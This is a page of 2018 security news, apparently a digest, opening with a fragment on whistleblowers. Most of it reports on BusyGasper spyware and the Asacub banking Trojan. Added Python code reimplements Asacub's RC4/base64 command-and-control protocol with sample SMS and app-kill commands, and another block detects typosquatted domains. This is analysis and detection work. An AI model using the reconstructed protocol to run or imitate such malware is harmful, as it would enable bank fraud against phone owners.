The amount of potential retaliation also depends on the whistleblower’s status as a public or private sector employee. It’s much safer to report wrongdoings and misdeeds in the public sector, as these issues often affect public health or safety and are almost always covered by local laws. Those in the private sector don’t always have such protection.


Long-Term Effects

Smaller, localized incidents tend to disappear after some time. While there are some famous cases and prominent names that are forever cast as whistleblowers — like Erin Brockovich and Edward Snowden — those cases are the exception.

Most whistleblowers have to leave their current job — especially if the issue involves their employer. Others accept a demotion or reassignment within the same organization, but these new positions typically don’t last very long.

Some whistleblowers go bankrupt during the process. It takes a lot of time to build a case and shed light on a company’s misdoings. Presenting the issue in a court of law adds weeks — and sometimes months or years — to the otherwise straightforward task of whistleblowing. Making matters worse is the fact that most court cases are not settled in the complainant’s favor.

Others have to relocate to another state or, in the most extreme cases, another country entirely. Edward Snowden, a U.S.-born citizen and former member of the CIA, currently lives under asylum in the Russian city of Moscow. Their government recently decided to extend his right to asylum until 2020 at the earliest.

Living Productively After Blowing the Whistle

The act of whistleblowing sometimes has unintended consequences that reach beyond the individual complainant, the offending company and the local community.

While it often addresses the misdeeds of corporations and governments around the world, the individuals who shed light on these shady acts are often targeted — legally or illegally — by those who don’t agree with their tactics for one reason or another.

Whether they’re seen as martyrs or miscreants, their lives are usually changed after the fact.

BusyGasper spyware remained undetected for two years while spying Russians
31.8.2018 securityaffairs  Android  CyberSpy

Security experts from Kaspersky Lab have uncovered a new strain of Android malware dubbed BusyGasper that remained hidden for two years.
The BusyGasper Android spyware has been active since May 2016 and implements features that are unusual for this type of malware. The experts describe it as a unique spy implant with stand-out capabilities such as listeners on the device sensors. BusyGasper can monitor all device sensors, enable GPS/network tracking, and run a set of initial commands when an incoming SMS contains a specific trigger string.

The malware has an unusually wide-ranging command protocol: it supports about 100 commands and is able to bypass the Doze battery saver.

BusyGasper can exfiltrate data from several messaging applications, including WhatsApp, Viber, Facebook, and implements keylogging capabilities.

“Further investigation showed that the malware, which we named BusyGasper, is not all that sophisticated, but demonstrates some unusual features for this type of threat.” reads the report published by Kaspersky.

“The sample has a multicomponent structure and can download a payload or updates from its C&C server, which happens to be an FTP server belonging to the free Russian web hosting service Ucoz.”


According to the researchers, the malware is installed manually, which requires physical access to the target device. Kaspersky has identified fewer than 10 victims to date, all of them located in Russia.

The spyware also supports the IRC protocol, which is very uncommon for Android malware.

The malicious code can log in to the attacker’s email inbox, parse emails in a special folder for commands and save any payloads to a device from email attachments.

The analysis of the malware revealed the attackers used the malware to gather victims’ personal data, including messages from IM applications and SMS banking messages.

“We found no similarities to commercial spyware products or to other known spyware variants, which suggests BusyGasper is self-developed and used by a single threat actor.” continues Kaspersky.

“At the same time, the lack of encryption, use of a public FTP server and the low opsec level could indicate that less skilled attackers are behind the malware”

The first module installed on the targeted device can be controlled over the IRC protocol and allows attackers to deploy additional components. The module appears to run with root privileges, but the researchers found no evidence of the use of an exploit to obtain them.

The module supports a wide range of commands including start/stop IRC, manage IRC settings, exit, use root features, report when the screen is on, hide/unhide the implant icon, execute shell, send commands to the second module, download and copy component to the system path, and write specified message to log.

The second module writes a log of the command execution history to a file named “lock,” which is later uploaded on the C&C server. Log messages can also be sent via SMS to the attacker’s number.

“Log files can be uploaded to the FTP server and sent to the attacker’s email inbox. It’s even possible to send log messages via SMS to the attacker’s number.” continues Kaspersky.

“As the screenshot above shows, the malware has its own command syntax that represents a combination of characters while the “#” symbol is a delimiter. A full list of all possible commands with descriptions can be found in Appendix II below.”

Experts discovered a hidden menu that could be used for manual operator control, it can be activated if the operator calls the hardcoded number “9909” from the infected device.

Kaspersky included in the report the IoCs.

The rise of mobile banker Asacub
30.8.2018 Kaspersky Android

We encountered the Trojan-Banker.AndroidOS.Asacub family for the first time in 2015, when the first versions of the malware were detected, analyzed, and found to be more adept at spying than stealing funds. The Trojan has evolved since then, aided by a large-scale distribution campaign by its creators (in spring-summer 2017), helping Asacub to claim top spots in last year’s ranking by number of attacks among mobile banking Trojans, outperforming other families such as Svpeng and Faketoken.

We decided to take a peek under the hood of a modern member of the Asacub family. Our eyes fell on the latest version of the Trojan, which is designed to steal money from owners of Android devices connected to the mobile banking service of one of Russia’s largest banks.

Asacub versions
Sewn into the body of the Trojan is the version number, consisting of two or three digits separated by periods. The numbering seems to have started anew after the version 9.

The name Asacub appeared with version 4 in late 2015; previous versions were known as Trojan-SMS.AndroidOS.Smaps. Versions 5.X.X-8.X.X were active in 2016, and versions 9.X.X-1.X.X in 2017. In 2018, the most actively distributed versions were 5.0.0 and 5.0.3.

Communication with C&C
Although Asacub’s capabilities gradually evolved, its network behavior and method of communication with the command-and-control (C&C) server changed little. This strongly suggested that the banking Trojans, despite differing in terms of capability, belong to the same family.

Data was always sent to the C&C server via HTTP in the body of a POST request in encrypted form to the relative address /something/index.php. In earlier versions, the something part of the relative path was a partially intelligible, yet random mix of words and short combinations of letters and numbers separated by an underscore, for example, “bee_bomb” or “my_te2_mms”.

Example of traffic from an early version of Asacub (2015)

The data transmitted and received is encrypted with the RC4 algorithm and encoded using the base64 standard. The C&C address and the encryption key (one for different modifications in versions 4.x and 5.x, and distinct for different C&Cs in later versions) are stitched into the body of the Trojan. In early versions of Asacub, .com, .biz, .info, .in, .pw were used as top-level domains. In the 2016 version, the value of the User-Agent header changed, as did the method of generating the relative path in the URL: now the part before /index.php is a mix of a pronounceable (if not entirely meaningful) word and random letters and numbers, for example, “muromec280j9tqeyjy5sm1qy71” or “parabbelumf8jgybdd6w0qa0”. Moreover, incoming traffic from the C&C server began to use gzip compression, and the top-level domain for all C&Cs was .com:

Since December 2016, the changes in C&C communication methods have affected only how the relative path in the URL is generated: the pronounceable word was replaced by a rather long random combination of letters and numbers, for example, “ozvi4malen7dwdh” or “f29u8oi77024clufhw1u5ws62”. At the time of writing this article, no other significant changes in Asacub’s network behavior had been observed:

The origin of Asacub
It is fairly safe to say that the Asacub family evolved from Trojan-SMS.AndroidOS.Smaps. Communication between both Trojans and their C&C servers is based on the same principle, the relative addresses to which Trojans send network requests are generated in a similar manner, and the set of possible commands that the two Trojans can perform also overlaps. What’s more, the numbering of Asacub versions is a continuation of the Smaps system. The main difference is that Smaps transmits data as plain text, while Asacub encrypts data with the RC4 algorithm and then encodes it into base64 format.

Let’s compare examples of traffic from Smaps and Asacub — an initializing request to the C&C server with information about the infected device and a response from the server with a command for execution:

Smaps request

Asacub request

Decrypted data from Asacub traffic:

{"id":"532bf15a-b784-47e5-92fa-72198a2929f5","type":"get","info":"imei:365548770159066, country:PL, cell:Tele2, android:4.2.2, model:GT-N5100, phonenumber:+486679225120, sim:6337076348906359089f, app:null, ver:5.0.2"}

Data sent to the server

[{"command":"sent&&&","params":{"to":"+79262000900","body":"\u0410\u0412\u0422\u041e\u041f\u041b\u0410\u0422\u0415\u0416 1000 50","timestamp":"1452272572"}},
Instructions received from the server

A comparison can also be made of the format in which Asacub and Smaps forward incoming SMS (encoded with the base64 algorithm) from the device to the C&C server:

Smaps format

Asacub format

Decrypted data from Asacub traffic:


The banking Trojan is propagated via phishing SMS containing a link and an offer to view a photo or MMS. The link points to a web page with a similar sentence and a button for downloading the APK file of the Trojan to the device.

The Trojan download window

Asacub masquerades under the guise of an MMS app or a client of a popular free ads service. We came across the names Photo, Message, Avito Offer, and MMS Message.

App icons under which Asacub masks itself

The APK files of the Trojan are downloaded from sites such as mmsprivate[.]site, photolike[.]fun, you-foto[.]site, and mms4you[.]me under names in the format:

For the Trojan to install, the user must allow installation of apps from unknown sources in the device settings.

During installation, depending on the version of the Trojan, Asacub prompts the user either for Device Administrator rights or for permission to use AccessibilityService. After receiving the rights, it sets itself as the default SMS app and disappears from the device screen. If the user ignores or rejects the request, the window reopens every few seconds.

The Trojan requests Device Administrator rights

The Trojan requests permission to use AccessibilityService

After installation, the Trojan starts communicating with the cybercriminals’ C&C server. All data is transmitted in JSON format (after decryption). It includes information about the smartphone model, the OS version, the mobile operator, and the Trojan version.

Let’s take an in-depth look at Asacub 5.0.3, the most widespread version in 2018.

Structure of data sent to the server:

Structure of data received from the server:

To begin with, the Trojan sends information about the device to the server:

“country”:int, //optional
“imei”:int //optional
In response, the server sends the code of the command for execution (“command”), its parameters (“params”), and the time delay before execution (“waitrun” in milliseconds).

List of commands sewn into the body of the Trojan:

Command code | Parameters                | Actions
2            | –                         | Sends the contact list from the infected device's address book to the C&C server
7            | "to":int                  | Calls the specified number
11           | "to":int, "body":string   | Sends an SMS with the specified text to the specified number
19           | "text":string, "n":string | Sends an SMS with the specified text to numbers from the infected device's address book, substituting the addressee's name from the address book into the message text
40           | "text":string             | Shuts down applications with specific names (antivirus and banking applications)
The set of possible commands is the most significant difference between the various flavors of Asacub. In the 2015-early 2016 versions examined in this article, C&C instructions in JSON format contained the name of the command in text form (“get_sms”, “block_phone”). In later versions, instead of the name of the command, its numerical code was transmitted. The same numerical code corresponded to one command in different versions, but the set of supported commands varied. For example, version 9.0.7 (2017) featured the following set of commands: 2, 4, 8, 11, 12, 15, 16, 17, 18, 19, 20.

After receiving the command, the Trojan attempts to execute it, before informing C&C of the execution status and any data received. The “id” value inside the “data” block is equal to the “timestamp” value of the relevant command:

In addition, the Trojan sets itself as the default SMS application and, on receiving a new SMS, forwards the sender’s number and the message text in base64 format to the cybercriminal:

Thus, Asacub can withdraw funds from a bank card linked to the phone by sending SMS for the transfer of funds to another account using the number of the card or mobile phone. Moreover, the Trojan intercepts SMS from the bank that contain one-time passwords and information about the balance of the linked bank card. Some versions of the Trojan can autonomously retrieve confirmation codes from such SMS and send them to the required number. What’s more, the user cannot check the balance via mobile banking or change any settings there, because after receiving the command with code 40, the Trojan prevents the banking app from running on the phone.
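As an added example that is not part of Kaspersky's report, the Python below reproduces the transport described earlier (JSON, RC4-encrypted, then base64-encoded in the POST body) and parses a server response in the numeric-code format of version 5.0.3, including the "waitrun" delay and the rule that the "id" in the bot's "data" block mirrors the command's "timestamp". The RC4 key, the sample response, the placeholder package name and the field names in the status report other than "id"/"timestamp" are assumptions for the demo; the command meanings come from the table above and the SMS parameters from the decrypted 2015 traffic shown earlier. With a real sample, the key is recovered from the APK first and the captured body is passed to decode_body.

```python
import base64
import json

# Assumed key for this demo. Real samples embed their own RC4 key in the APK
# (one key per C&C in later versions), so an analyst recovers it from the
# sample before decoding captured traffic.
DEMO_KEY = b"example-key"

def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA + PRGA). Encryption and decryption are the same operation."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def encode_body(key: bytes, obj) -> bytes:
    """JSON -> RC4 -> base64: the transform applied to POST bodies in both directions."""
    return base64.b64encode(rc4(key, json.dumps(obj, separators=(",", ":")).encode()))

def decode_body(key: bytes, body: bytes):
    """Reverse of encode_body, for a request or response body captured from a proxy or pcap."""
    return json.loads(rc4(key, base64.b64decode(body)).decode())

# Numeric command codes and their meaning, from the table for version 5.0.3.
COMMANDS = {
    2: "exfiltrate contact list",
    7: "place call",
    11: "send SMS",
    19: "send SMS to all contacts",
    40: "kill named apps (antivirus/banking)",
}

def explain_commands(key: bytes, body: bytes):
    """Decode a C&C response and summarise each command as (code, meaning, params, waitrun_ms).

    Handles both the numeric-code format (2016 onwards) and the older text-name
    format ("sent&&&", "get_sms", ...), so it can be pointed at traffic from any version.
    """
    cmds = decode_body(key, body)
    if isinstance(cmds, dict):
        cmds = [cmds]
    summary = []
    for c in cmds:
        raw = c["command"]
        code = int(raw) if str(raw).isdigit() else str(raw)
        if isinstance(code, int):
            meaning = COMMANDS.get(code, "unknown code")
        else:
            meaning = "text-form command (pre-2016 format)"
        summary.append((code, meaning, c.get("params", {}), int(c.get("waitrun", 0))))
    return summary

def status_report(cmd: dict, result) -> dict:
    """Reconstruct the bot's follow-up report. The "id" inside "data" mirrors the command's
    "timestamp"; the other field names here are assumptions for the demo."""
    return {"type": "result", "data": {"id": cmd["timestamp"], "result": result}}

# Constructed sample response: one SMS-sending command (parameters taken from the
# decrypted 2015 traffic shown earlier) and one app-kill command with a placeholder
# package name. "waitrun" is the delay before execution, in milliseconds.
SAMPLE_RESPONSE = [
    {"command": 11,
     "params": {"to": "+79262000900",
                "body": "\u0410\u0412\u0422\u041e\u041f\u041b\u0410\u0422\u0415\u0416 1000 50"},
     "timestamp": "1452272572", "waitrun": 3000},
    {"command": 40, "params": {"text": "com.example.bankapp"},
     "timestamp": "1452272580", "waitrun": 0},
]

if __name__ == "__main__":
    wire = encode_body(DEMO_KEY, SAMPLE_RESPONSE)   # what would appear in the HTTP body
    for code, meaning, params, delay in explain_commands(DEMO_KEY, wire):
        print(f"cmd {code!s:>3} after {delay} ms: {meaning} {params}")
    print(status_report(SAMPLE_RESPONSE[0], "sent"))
```

Because RC4 is a stream cipher with a fixed key per C&C, the same key also decrypts the device-info request the bot sends first, so one recovered key opens both directions of a capture; that is also why the unchanged transport has made traffic signatures for this family so durable.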

User messages created by the Trojan during installation typically contain grammatical and spelling errors, and use a mixture of Cyrillic and Latin characters.

The Trojan also employs various obfuscation methods: from the simplest, such as string concatenation and renaming of classes and methods, to implementing functions in native code and embedding SO libraries in C/C++ in the APK file, which requires the use of additional tools or dynamic analysis for deobfuscation, since most tools for static analysis of Android apps support only Dalvik bytecode. In some versions of Asacub, strings in the app are encrypted using the same algorithm as data sent to C&C, but with different keys.

Example of using native code for obfuscation

Examples of using string concatenation for obfuscation

Example of encrypting strings in the Trojan

Asacub distribution geography
Asacub is primarily aimed at Russian users: 98% of infections (225,000) occur in Russia, since the cybercriminals specifically target clients of a major Russian bank. The Trojan also hit users from Ukraine, Turkey, Germany, Belarus, Poland, Armenia, Kazakhstan, the US, and other countries.

The case of Asacub shows that mobile malware can function for several years with minimal changes to the distribution scheme.

It is basically SMS spam: many people still follow suspicious links, install software from third-party sources, and give permissions to apps without a second thought. At the same time, cybercriminals are reluctant to change the method of communication with the C&C server, since this would require more effort and reap less benefit than modifying the executable file. The most significant change in this particular Trojan’s history was the encryption of data sent between the device and C&C. That said, so as to hinder detection of new versions, the Trojan’s APK file and the C&C server domains are changed regularly, and the Trojan download links are often one-time-use.

C&C IP addresses:
IP addresses from which the Trojan was downloaded:

How Cybercriminals Are Using Blockchain to Their Advantage
30.8.2018 securityweek CyberCrime

Cybercriminals Have Been Experimenting With a Blockchain Domain Name System (DNS)

The takedowns of AlphaBay and Hansa in 2017 by law enforcement gave rise to much speculation about the future of dark web marketplaces. As I’ve discussed before, an environment of fear and mistrust are driving the cybercriminal community to incorporate alternative technologies to improve security and remain below the radar as they conduct illicit business online. One such technology is blockchain.

When most people hear the term “blockchain” they typically think of cryptocurrencies and other applications where transactions and interactions among a community of users must be executed with a high degree of trust, efficiency and transparency. However, if we consider the recent challenges that administrators of online criminal forums have encountered, it only makes sense that they would explore applications for blockchain. To that end, some have been experimenting with a blockchain domain name system (DNS) as a way of hiding their malicious activity and bullet-proofing their offerings.

A blockchain DNS differs from the traditional DNS. Typically, when we type a website name into a browser, the computer queries a DNS server for an IP address; the DNS is essentially the Internet's phone book. A domain name consists of the name of the entity and then, after the "dot", the extension known as the Top Level Domain (TLD), such as .com, .gov, .edu, .uk or .de. TLDs are controlled by a central authority: the Internet Corporation for Assigned Names and Numbers (ICANN) with global reach, or regional registries such as Nominet in the U.K. or DENIC in Germany. In contrast, a blockchain DNS is decentralized. Blockchain TLDs, including .bit, .bazar and .coin, are not owned by a single central authority; the name records are shared over a peer-to-peer network and resolved with different technology from ordinary DNS requests.

Decentralized DNS offers benefits such as countering censorship by authorities (for example, if a government orders all Internet Service Providers in a country to stop resolving a domain to its IP address) or preventing DNS spoofing, where attackers insert corrupt DNS data so that the name server returns an incorrect IP address and redirects traffic to an attacker-controlled computer. However, decentralized DNS can also be abused for malicious purposes. As blockchain domains have no central authority and registrations are tied to cryptographic keys rather than to an individual's name and address, it is harder for law enforcement to perform site takedowns. The following are just a few examples of bad actors using blockchain.

Back in January 2016, one of the first groups to employ blockchain DNS to create a .bazar domain in an attempt to better secure their operations was a group known as The Money Team. In July 2017, the Joker’s Stash, a popular Automated Vending Cart (AVC) site used to purchase stolen payment card details, began using blockchain DNS alongside its established Tor (.onion) domain. Users wanting to access the .bazar version of the site need to install a blockchain DNS browser extension or add-on. Other AVC sites and forums used to trade stolen account information have also been experimenting with peer-to-peer DNS technology.

Blockchain technology has also allowed users to realize alternative models for online marketplaces. The site known as Tralfamadore, for example, uses blockchain as its back-end to store the necessary databases and code to support front-end user interfaces. Transactions are made using cryptocurrency and recorded as smart contracts on the blockchain. The aim is to improve trust among users of the site as all transactions are permanently recorded and scam vendors can be more easily identified.

Another marketplace using blockchain technology is the site OpenBazaar. This project began in April 2016 and its userbase has increased steadily since then. In the first half of 2018, the number of new users on the site has risen by roughly 4,000, while the items for sale have gone up from 18,000 to over 27,000. Despite these gains, OpenBazaar has not been used for cybercriminal activity to any great extent, and the majority of items listed on the site would not be classed as illicit.

Despite these examples, it’s important to remember that as with most things in life, there are tradeoffs. The use of blockchain for cybercriminal activity is no exception. The primary issue preventing its wider adoption is that with blockchain-based platforms all interactions are publicly recorded. This goes against the strong desire by many users to engage in private messaging. Many cybercriminals are choosing to conduct their business away from dark web marketplaces and underground forums altogether. Instead, they are using their site to advertise their service and then directing users to dedicated channels on Jabber, Internet Relay Chat (IRC), Skype, Discord and Telegram to conduct their business. Buyers can contact sellers directly through peer-to-peer networks and private chat channels and execute transactions using cryptocurrencies or electronic payment services.

As cybersecurity professionals, we should continue to monitor for an uptick in the adoption of blockchain for the buying and selling of illicit goods. And while we’re at it, we should also continue to assess other emerging technologies that could be used for nefarious purposes. Because as long as there is a market for what cybercriminals have for sale – everything from compromised accounts and stolen payment cards to counterfeit goods – you can be sure they’ll find new and creative ways to profit.

Instagram Introduces New Account Safety Features
30.8.2018 securityweek

Instagram this week announced new features to boost account security and provide users with increased visibility into accounts with a large number of followers.

Instagram will soon provide users with the ability to evaluate the authenticity of an account that reaches large audiences. The information will be accessible through an “About This Account” option in the Profile menu, Mike Krieger, Co-Founder & CTO, explains in a blog post.

Information displayed will include the date the account joined Instagram, the country it is located in, accounts with shared followers, username changes in the last year, and details on the ads the account might be running.

The feature appears as a reaction to numerous misinformation campaigns that have been exposed over the past few months, some supposedly originating from Russia or Iran.

“Our community has told us that it’s important to them to have a deeper understanding of accounts that reach many people on Instagram, particularly when those accounts are sharing information related to current events, political or social causes, for example,” Krieger notes.

Starting next month, the social platform will allow people with accounts that reach large audiences to review the information about their accounts. Soon after, the “About This Account” feature will become available to the global community.

Additionally, Instagram is allowing accounts that reach large audiences and meet specific criteria to request verification through a form within the Instagram app. The social platform will review the requests “to confirm the authenticity, uniqueness, completeness and notability of each account,” Krieger says.

The verification request form is available by accessing the menu icon in the Profile section, selecting Settings, and then “Request Verification.” Users requesting verification will need to provide the account username, their full name, and a copy of their legal or business identification.

Instagram will review all requests but might decline verification for some accounts. The verification will be performed free of charge and users won’t be contacted to confirm verification.

Soon, the platform will also include support for third-party authenticator apps for those who choose to use such tools to log into their Instagram accounts.

To take advantage of the feature, users would need to access the profile section, tap the menu icon, go to “Settings,” and then select “Authentication App” in the “Two-Factor Authentication” section. If an authentication app is already installed, Instagram will automatically send a login code to it. Users will need to enter the code on Instagram to enable two-factor authentication.

According to Krieger, support for third-party authenticator apps is already rolling out to users and should reach all of them in the coming weeks.

Lithuanian Media Sign Pact With Govt to Counter Hackers
30.8.2018 securityweek BigBrothers

Lithuania's major online media outlets on Tuesday signed an agreement to work with the defence ministry as they try to fend off a growing barrage of cyber attacks, largely blamed on Russia.

Fears are increasing over possible meddling in elections next year in the Baltic EU and NATO state, where hackers have planted fake news stories on media organizations' websites, or crashed them altogether.

Warning that cyberattacks can sow "great chaos in society and in the state", Defence Minister Raimundas Karoblis said Tuesday that the state felt compelled to cooperate with the media to combat the attacks.

Under the agreement media groups will share information and strategies with government, while press representatives will be able to attend meetings of the National Cyber Security Council.

Lithuania's defence ministry has said attacks are becoming "more and more coordinated, complex and refined", while intelligence services say most of the hostile cyber activity can be traced back to Russia.

The national intelligence agency warned in March that "Russian hackers will likely use cyber tools to influence the upcoming elections in Lithuania in 2019", referring to upcoming presidential, local and European ballots.

Lithuanian online media outlets have crashed on numerous occasions in recent years after being subject to so-called distributed denial of service, or DDoS, attacks.

Last year hackers posted a fake news story on the site of the Baltic News Service (BNS) newswire alleging that a group of US troops in Latvia had been exposed to mustard gas.

Hackers also planted a fake news story about Karoblis coming out as being gay on the news website earlier this year.

Moscow has long objected to Lithuania's drive to join western institutions after it became the first republic to break free from the crumbling Soviet Union in 1990.

The Expected Spike in Post-GDPR Spam Activity Hasn't Happened
30.8.2018 securityweek Privacy

For many months it was expected that privacy protections afforded to consumers by GDPR would also benefit the bad guys. It was feared that security researchers would no longer be able to track new bad domains through WHOIS data, and that spammers would rush to register new domains under new GDPR-enforced anonymity; and that spam would spike once GDPR became effective in May 2018. It hasn't happened.

A new analysis from Recorded Future, combining spam volume data from Cisco's research and domain registrations from its own data sets shows -- if anything -- the reverse to be true. Allan Liska, threat intelligence analyst at Recorded Future, told SecurityWeek, "In the first 90 days since GDPR has been enacted, spam has actually declined, even taking into account the normal seasonal slump that happens during the summer. But it's not just spam volumes," he said, "but there have also been fewer new domains registered in the spammy gTLDs that tend to have a lot of spam."

Post-GDPR Spam Levels

In raw figures, according to Cisco's data, total email on May 1, 2018 stood at 433.9 billion messages, with spam accounting for 85.28% of all email. By August 1, 2018, total email had fallen to 361.83 billion (probably helped by GDPR's consent requirements for email marketing), with spam making up 85.14%. Those figures put spam at roughly 370 billion messages in early May (pre-GDPR) and 308 billion messages in August (post-GDPR).

The reason for the drop is not clear. "I don't have a good answer yet," Liska told SecurityWeek. "It may be that the bad guys are sitting back and waiting to see how it all plays out before they decide on their path forward." The last thing they will want to do is register a bunch of domains, "and then everything gets worked out between ICANN and the GDPR -- and the security researchers have full access to that WHOIS data again. So, the beginning groups may be in a wait and see mode."

Another possible cause for the non-appearance of the expected post-GDPR spike in spam is that the spammers don't think anything has really changed. It's true that most registrars have enacted the GDPR restrictions, so WHOIS data is now unavailable. "But there's no slackening in the researchers' use of other methodologies to track spam domains," said Liska. "IP tracking, for example: jumping from IP address to IP address through domain algorithms. That type of capability is still being used by the researchers, and researchers are relying more heavily on such techniques."

Possibly arguing in favor of a 'wait and see' approach by the spammers is a corresponding drop in new domain registrations in the more spammy gTLD domains. "Spamhaus keeps track of the top 10 most malicious domains," explained Liska, "and all of the gTLDs saw a strong drop in activity post GDPR. That's a bit unusual and you would think that if nothing's changed from the bad guys' point of view, then they would continue registering these bad domains -- but that doesn't seem to be the case."

The implication of this lack of activity in the spammy gTLDs is that spammers aren't currently planning any major new spam campaigns for the immediate future.

The best possible cause for this dip in spam -- which cannot be fully explained by the summer recess -- is that defenders are finally winning the battle against spam. New techniques and technologies -- especially machine learning algorithms -- are getting better at recognizing and blocking spam. If the spammers aren't making money, they'll move on to something different.

"We've seen a big drop in dot-biz registrations," commented Liska. Dot-biz has long been considered a particularly spammy gTLD, with around 40% of dot-biz domains considered to be spam domains. That still means that 60% of these are genuine, making it impossible to simply block all dot-biz domains. However, with machine learning working to probabilities rather than binary decisions, dot-biz plus a few other lesser flags could rapidly identify and block spam.

Where machine learning is particularly useful, added Liska, is in identifying new phishing and watering hole domains. This would include typosquatting domains and cybersquatting domains. The former would include look-alike spellings and a range of country suffixes that could be mistyped. Liska gave an example of misspelled domains. "Take Wells Fargo," he said. "There are numerous ways that could be misspelled while still looking the same. The letter 'o' could be changed to the numeric zero (Wells Farg0) or the lowercase 'ls' could be changed to uppercase 'Is' (WeIIs Fargo)."

Other examples include registering a well-known brand name in a country-specific domain, such as dot-cm (Cameroon), dot-co (Colombia), dot-om (Oman) and dot-ne (Niger). Each suffix is only a short typo away from the major dot-com and dot-net suffixes. Criminals register big brand names in these country domains and wait for people to make a typing mistake and land on their sites.

Cybersquatting domains do not rely on the user making an error while typing the domain, but on appearing to be a genuine company URL. Bad actors will sometimes add a new company tag line or use a new product and register it as a new domain. An example can be seen in the 2017 registration of '' by a resident of Beijing immediately after the Clydesdale Bank introduced its new online cyber foreign exchange service called CYBFX. It wasn't until February 14, 2018 that the UK domain registrar declared it an 'abusive registration' and transferred ownership to Clydesdale Bank.
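The look-alike, ccTLD-typo and cybersquatting patterns described above can be checked mechanically against a feed of newly registered domains. The Python below is an added example (not Recorded Future's tooling): it collapses look-alike characters (zero for o, capital I for l), tests for single-keystroke typos and adjacent-letter swaps, flags the ccTLDs named above, and catches a brand name embedded in a longer label. The brand, its list of legitimately owned domains and the sample feed are constructed for the demo and are not real findings.

```python
import re

# Look-alike substitutions the article calls out (digit zero for o, capital I for l)
# plus a few other common ones. Applied to both the brand and the candidate, so the
# comparison is symmetric.
_CONFUSABLE = str.maketrans({"0": "o", "1": "l", "i": "l", "|": "l", "5": "s", "3": "e", "4": "a"})

# ccTLDs one keystroke away from .com/.net, as listed above
# (.cm Cameroon, .co Colombia, .om Oman, .ne Niger).
TYPO_TLDS = {"cm", "co", "om", "ne"}

def skeleton(label: str) -> str:
    """Collapse a DNS label to a look-alike-insensitive form, e.g. 'weIIs-farg0' -> 'wellsfargo'."""
    s = label.lower().replace("rn", "m").replace("vv", "w")
    return re.sub(r"[^a-z]", "", s.translate(_CONFUSABLE))

def within_one_edit(a: str, b: str) -> bool:
    """True if the strings differ by at most one substitution, insertion, deletion or adjacent swap."""
    if a == b:
        return True
    if abs(len(a) - len(b)) > 1:
        return False
    if len(a) > len(b):
        a, b = b, a
    i = 0
    while i < len(a) and a[i] == b[i]:
        i += 1
    if len(a) == len(b):
        swapped = a[i:i + 2] == b[i:i + 2][::-1] and a[i + 2:] == b[i + 2:]
        return a[i + 1:] == b[i + 1:] or swapped
    return a[i:] == b[i + 1:]

def classify(domain, brand, legit):
    """Return a reason string if domain looks like a squat of brand, else None.

    legit is the set of domains the brand actually owns; those are skipped.
    """
    domain = domain.lower().rstrip(".")
    if domain in legit:
        return None
    labels = domain.split(".")
    if len(labels) < 2:
        return None
    sld, tld = labels[-2], labels[-1]
    target, sk = skeleton(brand), skeleton(sld)
    if sk == target:
        if tld in TYPO_TLDS:
            return "ccTLD one keystroke from .com/.net"
        if sld == brand:
            return "brand name on a TLD the brand does not own"
        return "look-alike characters or punctuation variant of brand name"
    if within_one_edit(sk, target):
        return "one-character typo of brand name"
    if target in sk:
        return "brand name embedded in a longer label (cybersquat)"
    return None

def scan(new_registrations, brand, legit):
    """Run classify over a newly-registered-domain feed; returns [(domain, reason), ...]."""
    hits = []
    for d in new_registrations:
        reason = classify(d, brand, legit)
        if reason:
            hits.append((d, reason))
    return hits

# Constructed feed of "new registrations" for the demo; none of these are real findings.
SAMPLE_FEED = [
    "wellsfargo.com",               # the brand's own domain, skipped
    "wellsfarg0.com",               # zero for o
    "weIIsfargo.com",               # capital I for l
    "wellsfargo.cm",                # Cameroon ccTLD, one keystroke from .com
    "wellsfargo.xyz",               # brand name on a TLD the brand does not own
    "welsfargo.com",                # dropped letter
    "wellsfrago.com",               # adjacent letters swapped
    "wellsfargo-secure-login.net",  # brand embedded in a longer label
    "example.org",                  # unrelated
]

if __name__ == "__main__":
    for d, why in scan(SAMPLE_FEED, "wellsfargo", {"wellsfargo.com"}):
        print(f"{d:32} {why}")
```

These rules are deliberately cheap so they can run over hundreds of thousands of registrations a day; short brand names and the one-edit rule produce false positives, so in practice the hits are scored together with other signals (registrar, TLD reputation such as the dot-biz rate quoted above, hosting) before anyone is paged.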

"There are hundreds of thousands of new domains registered every day," commented Liska. "It's almost impossible for a human to look through all of those domains to find bad things. Machine learning helps us find new registrations that are meant to look like well-known sites."

Does all this mean that the battle against the spammers is being won? "That would be great, but I don't think we can say that yet," he replied. While we can conjecture about why spam and new spam registrations have dipped rather than spiked after GDPR, we will have to wait on the results of the next few 90-day analyses that Recorded Future intends to deliver.

"I've been in this industry for almost 18 years," Liska told SecurityWeek, "and for 18 years we've been fighting spam and losing. I'd love to see that this dip is the beginning of a decline in spam; but my feeling is the bad guys are figuring out how to regroup, and assess the situation. They'll figure out a way round any problems, because that's what they always do. At some point we'll probably see a new uptick in spam volumes again, so we better just enjoy the lull while we have it."

Boston, Mass.-based Recorded Future, founded in 2009, raised $25 million in a Series E funding round led by Insight Venture Partners in October 2017 -- bringing the total funding raised to $57.9 million.

Hacktivist Drama 'Mr. Robot' to End With 4th Season in 2019
30.8.2018 securityweek IT

LOS ANGELES (AP) — The hacktivist thriller "Mr. Robot" is coming to an end.

USA Network said Wednesday the drama series starring Emmy Award-winner Rami Malek will air its fourth and final season in 2019.

In a statement, "Mr. Robot" creator Sam Esmail says he decided that it was time to bring the story to a close next season.

"Mr. Robot" will conclude the way he'd envisioned it since it began, Esmail says.

Malek plays Elliot, a troubled cyber-security engineer and hacker who's drawn into a revolutionary movement.

Christian Slater also stars in the Peabody Award-winning drama.

An air date for the final season of "Mr. Robot" was not announced.

FBI: No Evidence Clinton Server Hacked Despite Trump Tweet
30.8.2018 securityweek

WASHINGTON (AP) — The FBI said Wednesday that it has no evidence Hillary Clinton's private email server was compromised even though President Donald Trump tweeted a news report that alleged the Chinese had hacked it.

Trump tweeted Tuesday evening about a report in the conservative Daily Caller that said a Chinese-owned company operating in the Washington area had hacked the server Clinton had used as secretary of state and obtained nearly all of her emails.

Trump's tweet stated in part: "What are the odds that the FBI and DOJ are right on top of this? Actually, a very big story. Much classified information!"

